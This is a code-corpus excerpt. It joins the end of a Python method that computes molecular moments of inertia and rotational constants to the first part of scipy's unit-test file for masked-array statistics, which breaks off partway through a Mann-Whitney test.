choices = ('amu_bohr_2', 'amu_angstrom_2', 'g_cm_2')
units = units.lower()
if units not in choices:
raise ValueError("Invalid units, pick one of {}".format(choices))
moi_tensor = self.moment_of_inertia_tensor()
principal_moments, principal_axes = np.linalg.eigh(moi_tensor)
if units == "amu_bohr_2":
_check_scipy(_found_scipy)
bohr2ang = scipy.constants.value("atomic unit of length") / scipy.constants.angstrom
conv = 1 / bohr2ang ** 2
elif units == "amu_angstrom_2":
conv = 1
elif units == "g_cm_2":
_check_scipy(_found_scipy)
amu2g = scipy.constants.value("unified atomic mass unit") * scipy.constants.kilo
conv = amu2g * (scipy.constants.angstrom / scipy.constants.centi) ** 2
return conv * principal_moments, principal_axes
def rotational_constants(self, units='ghz'):
"""Compute the rotational constants in 1/cm or GHz."""
choices = ('invcm', 'ghz')
units = units.lower()
if units not in choices:
raise ValueError("Invalid units, pick one of {}".format(choices))
principal_moments = self.principal_moments_of_inertia("amu_angstrom_2")[0]
_check_scipy(_found_scipy)
bohr2ang = scipy.constants.value('atomic unit of length') / scipy.constants.angstrom
xfamu = 1 / scipy.constants.value('electron mass in u')
xthz = scipy.constants.value('hartree-hertz relationship')
rotghz = xthz * (bohr2ang ** 2) / (2 * xfamu * scipy.constants.giga)
if units == 'ghz':
conv = rotghz
if units == 'invcm':
ghz2invcm = scipy.constants.giga * scipy.constants.centi / scipy.constants.c
conv = rotghz * ghz2invcm
return conv / principal_moments
del find_package
| bsd-3-clause |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/scipy/stats/tests/test_mstats_basic.py | 16 | 53339 | """
Tests for the stats.mstats module (support for masked arrays)
"""
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from numpy import nan
import numpy.ma as ma
from numpy.ma import masked, nomask
import scipy.stats.mstats as mstats
from scipy import stats
from common_tests import check_named_results
from numpy.testing import TestCase, run_module_suite
from numpy.testing.decorators import skipif
from numpy.ma.testutils import (assert_equal, assert_almost_equal,
assert_array_almost_equal, assert_array_almost_equal_nulp, assert_,
assert_allclose, assert_raises, assert_array_equal)
class TestMquantiles(TestCase):
def test_mquantiles_limit_keyword(self):
# Regression test for Trac ticket #867
data = np.array([[6., 7., 1.],
[47., 15., 2.],
[49., 36., 3.],
[15., 39., 4.],
[42., 40., -999.],
[41., 41., -999.],
[7., -999., -999.],
[39., -999., -999.],
[43., -999., -999.],
[40., -999., -999.],
[36., -999., -999.]])
desired = [[19.2, 14.6, 1.45],
[40.0, 37.5, 2.5],
[42.8, 40.05, 3.55]]
quants = mstats.mquantiles(data, axis=0, limit=(0, 50))
assert_almost_equal(quants, desired)
class TestGMean(TestCase):
def test_1D(self):
a = (1,2,3,4)
actual = mstats.gmean(a)
desired = np.power(1*2*3*4,1./4.)
assert_almost_equal(actual, desired, decimal=14)
desired1 = mstats.gmean(a,axis=-1)
assert_almost_equal(actual, desired1, decimal=14)
assert_(not isinstance(desired1, ma.MaskedArray))
a = ma.array((1,2,3,4),mask=(0,0,0,1))
actual = mstats.gmean(a)
desired = np.power(1*2*3,1./3.)
assert_almost_equal(actual, desired,decimal=14)
desired1 = mstats.gmean(a,axis=-1)
assert_almost_equal(actual, desired1, decimal=14)
@skipif(not hasattr(np, 'float96'), 'cannot find float96 so skipping')
def test_1D_float96(self):
a = ma.array((1,2,3,4), mask=(0,0,0,1))
actual_dt = mstats.gmean(a, dtype=np.float96)
desired_dt = np.power(1 * 2 * 3, 1. / 3.).astype(np.float96)
assert_almost_equal(actual_dt, desired_dt, decimal=14)
assert_(actual_dt.dtype == desired_dt.dtype)
def test_2D(self):
a = ma.array(((1, 2, 3, 4), (1, 2, 3, 4), (1, 2, 3, 4)),
mask=((0, 0, 0, 0), (1, 0, 0, 1), (0, 1, 1, 0)))
actual = mstats.gmean(a)
desired = np.array((1,2,3,4))
assert_array_almost_equal(actual, desired, decimal=14)
desired1 = mstats.gmean(a,axis=0)
assert_array_almost_equal(actual, desired1, decimal=14)
actual = mstats.gmean(a, -1)
desired = ma.array((np.power(1*2*3*4,1./4.),
np.power(2*3,1./2.),
np.power(1*4,1./2.)))
assert_array_almost_equal(actual, desired, decimal=14)
class TestHMean(TestCase):
def test_1D(self):
a = (1,2,3,4)
actual = mstats.hmean(a)
desired = 4. / (1./1 + 1./2 + 1./3 + 1./4)
assert_almost_equal(actual, desired, decimal=14)
desired1 = mstats.hmean(ma.array(a),axis=-1)
assert_almost_equal(actual, desired1, decimal=14)
a = ma.array((1,2,3,4),mask=(0,0,0,1))
actual = mstats.hmean(a)
desired = 3. / (1./1 + 1./2 + 1./3)
assert_almost_equal(actual, desired,decimal=14)
desired1 = mstats.hmean(a,axis=-1)
assert_almost_equal(actual, desired1, decimal=14)
@skipif(not hasattr(np, 'float96'), 'cannot find float96 so skipping')
def test_1D_float96(self):
a = ma.array((1,2,3,4), mask=(0,0,0,1))
actual_dt = mstats.hmean(a, dtype=np.float96)
desired_dt = np.asarray(3. / (1./1 + 1./2 + 1./3),
dtype=np.float96)
assert_almost_equal(actual_dt, desired_dt, decimal=14)
assert_(actual_dt.dtype == desired_dt.dtype)
def test_2D(self):
a = ma.array(((1,2,3,4),(1,2,3,4),(1,2,3,4)),
mask=((0,0,0,0),(1,0,0,1),(0,1,1,0)))
actual = mstats.hmean(a)
desired = ma.array((1,2,3,4))
assert_array_almost_equal(actual, desired, decimal=14)
actual1 = mstats.hmean(a,axis=-1)
desired = (4./(1/1.+1/2.+1/3.+1/4.),
2./(1/2.+1/3.),
2./(1/1.+1/4.)
)
assert_array_almost_equal(actual1, desired, decimal=14)
class TestRanking(TestCase):
def __init__(self, *args, **kwargs):
TestCase.__init__(self, *args, **kwargs)
def test_ranking(self):
x = ma.array([0,1,1,1,2,3,4,5,5,6,])
assert_almost_equal(mstats.rankdata(x),
[1,3,3,3,5,6,7,8.5,8.5,10])
x[[3,4]] = masked
assert_almost_equal(mstats.rankdata(x),
[1,2.5,2.5,0,0,4,5,6.5,6.5,8])
assert_almost_equal(mstats.rankdata(x, use_missing=True),
[1,2.5,2.5,4.5,4.5,4,5,6.5,6.5,8])
x = ma.array([0,1,5,1,2,4,3,5,1,6,])
assert_almost_equal(mstats.rankdata(x),
[1,3,8.5,3,5,7,6,8.5,3,10])
x = ma.array([[0,1,1,1,2], [3,4,5,5,6,]])
assert_almost_equal(mstats.rankdata(x),
[[1,3,3,3,5], [6,7,8.5,8.5,10]])
assert_almost_equal(mstats.rankdata(x, axis=1),
[[1,3,3,3,5], [1,2,3.5,3.5,5]])
assert_almost_equal(mstats.rankdata(x,axis=0),
[[1,1,1,1,1], [2,2,2,2,2,]])
class TestCorr(TestCase):
def test_pearsonr(self):
# Tests some computations of Pearson's r
x = ma.arange(10)
with warnings.catch_warnings():
# The tests in this context are edge cases, with perfect
# correlation or anticorrelation, or totally masked data.
# None of these should trigger a RuntimeWarning.
warnings.simplefilter("error", RuntimeWarning)
assert_almost_equal(mstats.pearsonr(x, x)[0], 1.0)
assert_almost_equal(mstats.pearsonr(x, x[::-1])[0], -1.0)
x = ma.array(x, mask=True)
pr = mstats.pearsonr(x, x)
assert_(pr[0] is masked)
assert_(pr[1] is masked)
x1 = ma.array([-1.0, 0.0, 1.0])
y1 = ma.array([0, 0, 3])
r, p = mstats.pearsonr(x1, y1)
assert_almost_equal(r, np.sqrt(3)/2)
assert_almost_equal(p, 1.0/3)
# (x2, y2) have the same unmasked data as (x1, y1).
mask = [False, False, False, True]
x2 = ma.array([-1.0, 0.0, 1.0, 99.0], mask=mask)
y2 = ma.array([0, 0, 3, -1], mask=mask)
r, p = mstats.pearsonr(x2, y2)
assert_almost_equal(r, np.sqrt(3)/2)
assert_almost_equal(p, 1.0/3)
def test_spearmanr(self):
# Tests some computations of Spearman's rho
(x, y) = ([5.05,6.75,3.21,2.66],[1.65,2.64,2.64,6.95])
assert_almost_equal(mstats.spearmanr(x,y)[0], -0.6324555)
(x, y) = ([5.05,6.75,3.21,2.66,np.nan],[1.65,2.64,2.64,6.95,np.nan])
(x, y) = (ma.fix_invalid(x), ma.fix_invalid(y))
assert_almost_equal(mstats.spearmanr(x,y)[0], -0.6324555)
x = [2.0, 47.4, 42.0, 10.8, 60.1, 1.7, 64.0, 63.1,
1.0, 1.4, 7.9, 0.3, 3.9, 0.3, 6.7]
y = [22.6, 8.3, 44.4, 11.9, 24.6, 0.6, 5.7, 41.6,
0.0, 0.6, 6.7, 3.8, 1.0, 1.2, 1.4]
assert_almost_equal(mstats.spearmanr(x,y)[0], 0.6887299)
x = [2.0, 47.4, 42.0, 10.8, 60.1, 1.7, 64.0, 63.1,
1.0, 1.4, 7.9, 0.3, 3.9, 0.3, 6.7, np.nan]
y = [22.6, 8.3, 44.4, 11.9, 24.6, 0.6, 5.7, 41.6,
0.0, 0.6, 6.7, 3.8, 1.0, 1.2, 1.4, np.nan]
(x, y) = (ma.fix_invalid(x), ma.fix_invalid(y))
assert_almost_equal(mstats.spearmanr(x,y)[0], 0.6887299)
# test for namedtuple attributes
res = mstats.spearmanr(x, y)
attributes = ('correlation', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_kendalltau(self):
# Tests some computations of Kendall's tau
x = ma.fix_invalid([5.05, 6.75, 3.21, 2.66,np.nan])
y = ma.fix_invalid([1.65, 26.5, -5.93, 7.96, np.nan])
z = ma.fix_invalid([1.65, 2.64, 2.64, 6.95, np.nan])
assert_almost_equal(np.asarray(mstats.kendalltau(x,y)),
[+0.3333333,0.4969059])
assert_almost_equal(np.asarray(mstats.kendalltau(x,z)),
[-0.5477226,0.2785987])
#
x = ma.fix_invalid([0, 0, 0, 0,20,20, 0,60, 0,20,
10,10, 0,40, 0,20, 0, 0, 0, 0, 0, np.nan])
y = ma.fix_invalid([0,80,80,80,10,33,60, 0,67,27,
25,80,80,80,80,80,80, 0,10,45, np.nan, 0])
result = mstats.kendalltau(x,y)
assert_almost_equal(np.asarray(result), [-0.1585188, 0.4128009])
# test for namedtuple attributes
res = mstats.kendalltau(x, y)
attributes = ('correlation', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_kendalltau_seasonal(self):
# Tests the seasonal Kendall tau.
x = [[nan,nan, 4, 2, 16, 26, 5, 1, 5, 1, 2, 3, 1],
[4, 3, 5, 3, 2, 7, 3, 1, 1, 2, 3, 5, 3],
[3, 2, 5, 6, 18, 4, 9, 1, 1,nan, 1, 1,nan],
[nan, 6, 11, 4, 17,nan, 6, 1, 1, 2, 5, 1, 1]]
x = ma.fix_invalid(x).T
output = mstats.kendalltau_seasonal(x)
assert_almost_equal(output['global p-value (indep)'], 0.008, 3)
assert_almost_equal(output['seasonal p-value'].round(2),
[0.18,0.53,0.20,0.04])
def test_pointbiserial(self):
x = [1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,
0,0,0,0,1,-1]
y = [14.8,13.8,12.4,10.1,7.1,6.1,5.8,4.6,4.3,3.5,3.3,3.2,3.0,
2.8,2.8,2.5,2.4,2.3,2.1,1.7,1.7,1.5,1.3,1.3,1.2,1.2,1.1,
0.8,0.7,0.6,0.5,0.2,0.2,0.1,np.nan]
assert_almost_equal(mstats.pointbiserialr(x, y)[0], 0.36149, 5)
# test for namedtuple attributes
res = mstats.pointbiserialr(x, y)
attributes = ('correlation', 'pvalue')
check_named_results(res, attributes, ma=True)
class TestTrimming(TestCase):
def test_trim(self):
a = ma.arange(10)
assert_equal(mstats.trim(a), [0,1,2,3,4,5,6,7,8,9])
a = ma.arange(10)
assert_equal(mstats.trim(a,(2,8)), [None,None,2,3,4,5,6,7,8,None])
a = ma.arange(10)
assert_equal(mstats.trim(a,limits=(2,8),inclusive=(False,False)),
[None,None,None,3,4,5,6,7,None,None])
a = ma.arange(10)
assert_equal(mstats.trim(a,limits=(0.1,0.2),relative=True),
[None,1,2,3,4,5,6,7,None,None])
a = ma.arange(12)
a[[0,-1]] = a[5] = masked
assert_equal(mstats.trim(a, (2,8)),
[None, None, 2, 3, 4, None, 6, 7, 8, None, None, None])
x = ma.arange(100).reshape(10, 10)
expected = [1]*10 + [0]*70 + [1]*20
trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=None)
assert_equal(trimx._mask.ravel(), expected)
trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=0)
assert_equal(trimx._mask.ravel(), expected)
trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=-1)
assert_equal(trimx._mask.T.ravel(), expected)
# same as above, but with an extra masked row inserted
x = ma.arange(110).reshape(11, 10)
x[1] = masked
expected = [1]*20 + [0]*70 + [1]*20
trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=None)
assert_equal(trimx._mask.ravel(), expected)
trimx = mstats.trim(x, (0.1,0.2), relative=True, axis=0)
assert_equal(trimx._mask.ravel(), expected)
trimx = mstats.trim(x.T, (0.1,0.2), relative=True, axis=-1)
assert_equal(trimx.T._mask.ravel(), expected)
def test_trim_old(self):
x = ma.arange(100)
assert_equal(mstats.trimboth(x).count(), 60)
assert_equal(mstats.trimtail(x,tail='r').count(), 80)
x[50:70] = masked
trimx = mstats.trimboth(x)
assert_equal(trimx.count(), 48)
assert_equal(trimx._mask, [1]*16 + [0]*34 + [1]*20 + [0]*14 + [1]*16)
x._mask = nomask
x.shape = (10,10)
assert_equal(mstats.trimboth(x).count(), 60)
assert_equal(mstats.trimtail(x).count(), 80)
def test_trimmedmean(self):
data = ma.array([77, 87, 88,114,151,210,219,246,253,262,
296,299,306,376,428,515,666,1310,2611])
assert_almost_equal(mstats.trimmed_mean(data,0.1), 343, 0)
assert_almost_equal(mstats.trimmed_mean(data,(0.1,0.1)), 343, 0)
assert_almost_equal(mstats.trimmed_mean(data,(0.2,0.2)), 283, 0)
def test_trimmed_stde(self):
data = ma.array([77, 87, 88,114,151,210,219,246,253,262,
296,299,306,376,428,515,666,1310,2611])
assert_almost_equal(mstats.trimmed_stde(data,(0.2,0.2)), 56.13193, 5)
assert_almost_equal(mstats.trimmed_stde(data,0.2), 56.13193, 5)
def test_winsorization(self):
data = ma.array([77, 87, 88,114,151,210,219,246,253,262,
296,299,306,376,428,515,666,1310,2611])
assert_almost_equal(mstats.winsorize(data,(0.2,0.2)).var(ddof=1),
21551.4, 1)
data[5] = masked
winsorized = mstats.winsorize(data)
assert_equal(winsorized.mask, data.mask)
class TestMoments(TestCase):
# Comparison numbers are found using R v.1.5.1
# note that length(testcase) = 4
# testmathworks comes from documentation for the
# Statistics Toolbox for Matlab and can be found at both
# http://www.mathworks.com/access/helpdesk/help/toolbox/stats/kurtosis.shtml
# http://www.mathworks.com/access/helpdesk/help/toolbox/stats/skewness.shtml
# Note that both test cases came from here.
testcase = [1,2,3,4]
testmathworks = ma.fix_invalid([1.165, 0.6268, 0.0751, 0.3516, -0.6965,
np.nan])
testcase_2d = ma.array(
np.array([[0.05245846, 0.50344235, 0.86589117, 0.36936353, 0.46961149],
[0.11574073, 0.31299969, 0.45925772, 0.72618805, 0.75194407],
[0.67696689, 0.91878127, 0.09769044, 0.04645137, 0.37615733],
[0.05903624, 0.29908861, 0.34088298, 0.66216337, 0.83160998],
[0.64619526, 0.94894632, 0.27855892, 0.0706151, 0.39962917]]),
mask=np.array([[True, False, False, True, False],
[True, True, True, False, True],
[False, False, False, False, False],
[True, True, True, True, True],
[False, False, True, False, False]], dtype=bool))
def test_moment(self):
y = mstats.moment(self.testcase,1)
assert_almost_equal(y,0.0,10)
y = mstats.moment(self.testcase,2)
assert_almost_equal(y,1.25)
y = mstats.moment(self.testcase,3)
assert_almost_equal(y,0.0)
y = mstats.moment(self.testcase,4)
assert_almost_equal(y,2.5625)
def test_variation(self):
y = mstats.variation(self.testcase)
assert_almost_equal(y,0.44721359549996, 10)
def test_skewness(self):
y = mstats.skew(self.testmathworks)
assert_almost_equal(y,-0.29322304336607,10)
y = mstats.skew(self.testmathworks,bias=0)
assert_almost_equal(y,-0.437111105023940,10)
y = mstats.skew(self.testcase)
assert_almost_equal(y,0.0,10)
def test_kurtosis(self):
# Set flags for axis = 0 and fisher=0 (Pearson's definition of kurtosis
# for compatibility with Matlab)
y = mstats.kurtosis(self.testmathworks,0,fisher=0,bias=1)
assert_almost_equal(y, 2.1658856802973,10)
# Note that MATLAB has confusing docs for the following case
# kurtosis(x,0) gives an unbiased estimate of Pearson's skewness
# kurtosis(x) gives a biased estimate of Fisher's skewness (Pearson-3)
# The MATLAB docs imply that both should give Fisher's
y = mstats.kurtosis(self.testmathworks,fisher=0, bias=0)
assert_almost_equal(y, 3.663542721189047,10)
y = mstats.kurtosis(self.testcase,0,0)
assert_almost_equal(y,1.64)
# test that kurtosis works on multidimensional masked arrays
correct_2d = ma.array(np.array([-1.5, -3., -1.47247052385, 0.,
-1.26979517952]),
mask=np.array([False, False, False, True,
False], dtype=bool))
assert_array_almost_equal(mstats.kurtosis(self.testcase_2d, 1),
correct_2d)
for i, row in enumerate(self.testcase_2d):
assert_almost_equal(mstats.kurtosis(row), correct_2d[i])
correct_2d_bias_corrected = ma.array(
np.array([-1.5, -3., -1.88988209538, 0., -0.5234638463918877]),
mask=np.array([False, False, False, True, False], dtype=bool))
assert_array_almost_equal(mstats.kurtosis(self.testcase_2d, 1,
bias=False),
correct_2d_bias_corrected)
for i, row in enumerate(self.testcase_2d):
assert_almost_equal(mstats.kurtosis(row, bias=False),
correct_2d_bias_corrected[i])
# Check consistency between stats and mstats implementations
assert_array_almost_equal_nulp(mstats.kurtosis(self.testcase_2d[2, :]),
stats.kurtosis(self.testcase_2d[2, :]),
nulp=4)
def test_mode(self):
a1 = [0,0,0,1,1,1,2,3,3,3,3,4,5,6,7]
a2 = np.reshape(a1, (3,5))
a3 = np.array([1,2,3,4,5,6])
a4 = np.reshape(a3, (3,2))
ma1 = ma.masked_where(ma.array(a1) > 2, a1)
ma2 = ma.masked_where(a2 > 2, a2)
ma3 = ma.masked_where(a3 < 2, a3)
ma4 = ma.masked_where(ma.array(a4) < 2, a4)
assert_equal(mstats.mode(a1, axis=None), (3,4))
assert_equal(mstats.mode(a1, axis=0), (3,4))
assert_equal(mstats.mode(ma1, axis=None), (0,3))
assert_equal(mstats.mode(a2, axis=None), (3,4))
assert_equal(mstats.mode(ma2, axis=None), (0,3))
assert_equal(mstats.mode(a3, axis=None), (1,1))
assert_equal(mstats.mode(ma3, axis=None), (2,1))
assert_equal(mstats.mode(a2, axis=0), ([[0,0,0,1,1]], [[1,1,1,1,1]]))
assert_equal(mstats.mode(ma2, axis=0), ([[0,0,0,1,1]], [[1,1,1,1,1]]))
assert_equal(mstats.mode(a2, axis=-1), ([[0],[3],[3]], [[3],[3],[1]]))
assert_equal(mstats.mode(ma2, axis=-1), ([[0],[1],[0]], [[3],[1],[0]]))
assert_equal(mstats.mode(ma4, axis=0), ([[3,2]], [[1,1]]))
assert_equal(mstats.mode(ma4, axis=-1), ([[2],[3],[5]], [[1],[1],[1]]))
a1_res = mstats.mode(a1, axis=None)
# test for namedtuple attributes
attributes = ('mode', 'count')
check_named_results(a1_res, attributes, ma=True)
def test_mode_modifies_input(self):
# regression test for gh-6428: mode(..., axis=None) may not modify
# the input array
im = np.zeros((100, 100))
im[:50, :] += 1
im[:, :50] += 1
cp = im.copy()
a = mstats.mode(im, None)
assert_equal(im, cp)
class TestPercentile(TestCase):
def setUp(self):
self.a1 = [3,4,5,10,-3,-5,6]
self.a2 = [3,-6,-2,8,7,4,2,1]
self.a3 = [3.,4,5,10,-3,-5,-6,7.0]
def test_percentile(self):
x = np.arange(8) * 0.5
assert_equal(mstats.scoreatpercentile(x, 0), 0.)
assert_equal(mstats.scoreatpercentile(x, 100), 3.5)
assert_equal(mstats.scoreatpercentile(x, 50), 1.75)
def test_2D(self):
x = ma.array([[1, 1, 1],
[1, 1, 1],
[4, 4, 3],
[1, 1, 1],
[1, 1, 1]])
assert_equal(mstats.scoreatpercentile(x,50), [1,1,1])
class TestVariability(TestCase):
""" Comparison numbers are found using R v.1.5.1
note that length(testcase) = 4
"""
testcase = ma.fix_invalid([1,2,3,4,np.nan])
def test_signaltonoise(self):
# This is not in R, so used:
# mean(testcase, axis=0) / (sqrt(var(testcase)*3/4))
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
y = mstats.signaltonoise(self.testcase)
assert_almost_equal(y, 2.236067977)
def test_sem(self):
# This is not in R, so used: sqrt(var(testcase)*3/4) / sqrt(3)
y = mstats.sem(self.testcase)
assert_almost_equal(y, 0.6454972244)
n = self.testcase.count()
assert_allclose(mstats.sem(self.testcase, ddof=0) * np.sqrt(n/(n-2)),
mstats.sem(self.testcase, ddof=2))
def test_zmap(self):
# This is not in R, so tested by using:
# (testcase[i]-mean(testcase,axis=0)) / sqrt(var(testcase)*3/4)
y = mstats.zmap(self.testcase, self.testcase)
desired_unmaskedvals = ([-1.3416407864999, -0.44721359549996,
0.44721359549996, 1.3416407864999])
assert_array_almost_equal(desired_unmaskedvals,
y.data[y.mask == False], decimal=12)
def test_zscore(self):
# This is not in R, so tested by using:
# (testcase[i]-mean(testcase,axis=0)) / sqrt(var(testcase)*3/4)
y = mstats.zscore(self.testcase)
desired = ma.fix_invalid([-1.3416407864999, -0.44721359549996,
0.44721359549996, 1.3416407864999, np.nan])
assert_almost_equal(desired, y, decimal=12)
class TestMisc(TestCase):
def test_obrientransform(self):
args = [[5]*5+[6]*11+[7]*9+[8]*3+[9]*2+[10]*2,
[6]+[7]*2+[8]*4+[9]*9+[10]*16]
result = [5*[3.1828]+11*[0.5591]+9*[0.0344]+3*[1.6086]+2*[5.2817]+2*[11.0538],
[10.4352]+2*[4.8599]+4*[1.3836]+9*[0.0061]+16*[0.7277]]
assert_almost_equal(np.round(mstats.obrientransform(*args).T,4),
result,4)
def test_kstwosamp(self):
x = [[nan,nan, 4, 2, 16, 26, 5, 1, 5, 1, 2, 3, 1],
[4, 3, 5, 3, 2, 7, 3, 1, 1, 2, 3, 5, 3],
[3, 2, 5, 6, 18, 4, 9, 1, 1,nan, 1, 1,nan],
[nan, 6, 11, 4, 17,nan, 6, 1, 1, 2, 5, 1, 1]]
x = ma.fix_invalid(x).T
(winter,spring,summer,fall) = x.T
assert_almost_equal(np.round(mstats.ks_twosamp(winter,spring),4),
(0.1818,0.9892))
assert_almost_equal(np.round(mstats.ks_twosamp(winter,spring,'g'),4),
(0.1469,0.7734))
assert_almost_equal(np.round(mstats.ks_twosamp(winter,spring,'l'),4),
(0.1818,0.6744))
def test_friedmanchisq(self):
# No missing values
args = ([9.0,9.5,5.0,7.5,9.5,7.5,8.0,7.0,8.5,6.0],
[7.0,6.5,7.0,7.5,5.0,8.0,6.0,6.5,7.0,7.0],
[6.0,8.0,4.0,6.0,7.0,6.5,6.0,4.0,6.5,3.0])
result = mstats.friedmanchisquare(*args)
assert_almost_equal(result[0], 10.4737, 4)
assert_almost_equal(result[1], 0.005317, 6)
# Missing values
x = [[nan,nan, 4, 2, 16, 26, 5, 1, 5, 1, 2, 3, 1],
[4, 3, 5, 3, 2, 7, 3, 1, 1, 2, 3, 5, 3],
[3, 2, 5, 6, 18, 4, 9, 1, 1,nan, 1, 1,nan],
[nan, 6, 11, 4, 17,nan, 6, 1, 1, 2, 5, 1, 1]]
x = ma.fix_invalid(x)
result = mstats.friedmanchisquare(*x)
assert_almost_equal(result[0], 2.0156, 4)
assert_almost_equal(result[1], 0.5692, 4)
# test for namedtuple attributes
attributes = ('statistic', 'pvalue')
check_named_results(result, attributes, ma=True)
def test_regress_simple():
# Regress a line with sinusoidal noise. Test for #1273.
x = np.linspace(0, 100, 100)
y = 0.2 * np.linspace(0, 100, 100) + 10
y += np.sin(np.linspace(0, 20, 100))
slope, intercept, r_value, p_value, sterr = mstats.linregress(x, y)
assert_almost_equal(slope, 0.19644990055858422)
assert_almost_equal(intercept, 10.211269918932341)
# test for namedtuple attributes
res = mstats.linregress(x, y)
attributes = ('slope', 'intercept', 'rvalue', 'pvalue', 'stderr')
check_named_results(res, attributes, ma=True)
def test_theilslopes():
# Test for basic slope and intercept.
slope, intercept, lower, upper = mstats.theilslopes([0,1,1])
assert_almost_equal(slope, 0.5)
assert_almost_equal(intercept, 0.5)
# Test for correct masking.
y = np.ma.array([0,1,100,1], mask=[False, False, True, False])
slope, intercept, lower, upper = mstats.theilslopes(y)
assert_almost_equal(slope, 1./3)
assert_almost_equal(intercept, 2./3)
# Test of confidence intervals from example in Sen (1968).
x = [1, 2, 3, 4, 10, 12, 18]
y = [9, 15, 19, 20, 45, 55, 78]
slope, intercept, lower, upper = mstats.theilslopes(y, x, 0.07)
assert_almost_equal(slope, 4)
assert_almost_equal(upper, 4.38, decimal=2)
assert_almost_equal(lower, 3.71, decimal=2)
def test_plotting_positions():
# Regression test for #1256
pos = mstats.plotting_positions(np.arange(3), 0, 0)
assert_array_almost_equal(pos.data, np.array([0.25, 0.5, 0.75]))
class TestNormalitytests():
def test_vs_nonmasked(self):
x = np.array((-2,-1,0,1,2,3)*4)**2
assert_array_almost_equal(mstats.normaltest(x),
stats.normaltest(x))
assert_array_almost_equal(mstats.skewtest(x),
stats.skewtest(x))
assert_array_almost_equal(mstats.kurtosistest(x),
stats.kurtosistest(x))
funcs = [stats.normaltest, stats.skewtest, stats.kurtosistest]
mfuncs = [mstats.normaltest, mstats.skewtest, mstats.kurtosistest]
x = [1, 2, 3, 4]
for func, mfunc in zip(funcs, mfuncs):
assert_raises(ValueError, func, x)
assert_raises(ValueError, mfunc, x)
def test_axis_None(self):
# Test axis=None (equal to axis=0 for 1-D input)
x = np.array((-2,-1,0,1,2,3)*4)**2
assert_allclose(mstats.normaltest(x, axis=None), mstats.normaltest(x))
assert_allclose(mstats.skewtest(x, axis=None), mstats.skewtest(x))
assert_allclose(mstats.kurtosistest(x, axis=None),
mstats.kurtosistest(x))
def test_maskedarray_input(self):
# Add some masked values, test result doesn't change
x = np.array((-2,-1,0,1,2,3)*4)**2
xm = np.ma.array(np.r_[np.inf, x, 10],
mask=np.r_[True, [False] * x.size, True])
assert_allclose(mstats.normaltest(xm), stats.normaltest(x))
assert_allclose(mstats.skewtest(xm), stats.skewtest(x))
assert_allclose(mstats.kurtosistest(xm), stats.kurtosistest(x))
def test_nd_input(self):
x = np.array((-2,-1,0,1,2,3)*4)**2
x_2d = np.vstack([x] * 2).T
for func in [mstats.normaltest, mstats.skewtest, mstats.kurtosistest]:
res_1d = func(x)
res_2d = func(x_2d)
assert_allclose(res_2d[0], [res_1d[0]] * 2)
assert_allclose(res_2d[1], [res_1d[1]] * 2)
def test_normaltest_result_attributes(self):
x = np.array((-2, -1, 0, 1, 2, 3)*4)**2
res = mstats.normaltest(x)
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
def test_kurtosistest_result_attributes(self):
x = np.array((-2, -1, 0, 1, 2, 3)*4)**2
res = mstats.kurtosistest(x)
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
class TestFOneway():
def test_result_attributes(self):
a = np.array([655, 788], dtype=np.uint16)
b = np.array([789, 772], dtype=np.uint16)
res = mstats.f_oneway(a, b)
attributes = ('statistic', 'pvalue')
check_named_results(res, attributes, ma=True)
class TestMannwhitneyu():
def test_result_attributes(self):
x = np.array([1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 2., 1., 1., 2.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 3., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1.])
y = np.array([1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1., 1., 1., 1.,
2., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2., 1., 1., 3.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1.,
1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2.,
2., 1., 1., 2., 1., 1., 2., 1., 2., 1., 1., 1., 1., 2.,
2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 2., 1., 1., 1., 1., 1., 2., 2., 2., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
2., 1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 2., 1., 1.,
1., 1., 1., 1.])
res = mstats.mannwhitneyu(x, y)
